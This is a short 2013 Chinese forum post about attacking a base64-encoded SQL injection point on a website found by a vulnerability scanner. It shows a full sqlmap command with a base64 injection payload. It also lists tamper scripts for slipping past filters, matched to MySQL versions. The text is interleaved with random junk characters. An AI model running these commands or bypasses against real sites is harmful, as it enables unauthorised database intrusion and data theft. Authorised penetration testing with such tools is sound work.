找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2176|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?: d4 Y$ p: g6 z/ s& A0 c

' Z- b  s( H# [! v3 Z# \! q  o4 Usqlmap的tamper里有个base64encode.py! R" w5 V! y" X* i9 d3 p. t

0 W5 L9 p) w7 G* l% ?9 H- y3 \使用如下0 x4 j4 l& W5 |8 j4 N; }; u

6 O& x/ n2 \* v; C9 ~sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
8 z+ R- U' _9 |  t4 _  E9 C$ _, h$ S: T
' w; D3 Y: V' F0 |3 h
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
9 w5 E! H/ t6 z" E2 b: `2 y
- H. l- J' G" T0 R% b其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
5 B* E! z' A% c: o) Z. |2 `1 y9 l* ], G3 B
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入+ Z! T+ l* B  _8 A( A; K
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
. x* ^5 h+ Z% ^首先确定目标数据库版本,然后选择相应的脚本。
0 d( r( b5 b( @) ?; @' F: N2 W-v 3 --batch --tamper "space2hash.py"( y. ~) q) e! ]3 v
* \+ K& {. d1 \9 i: K7 X
还有其他一些插件:
* U$ S3 @! T$ Y3 w# `. q$ Gencodes编码 ——charencode.py# L8 _5 h% L8 n& _
base64编码 —— base64encode.py
: d6 K7 A1 C5 M, I% Z# F4 c7 a3 o  O替换空格和关键字 —— halfversionedmorekeywords.py
/ @$ S. O9 v, l* v# e
5 I* U+ l; C! Q' \0 x# A

3 u7 u% c3 R6 h  C
4 s3 n, G- Y  ]) W' a
. P9 z. j4 B1 W, Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表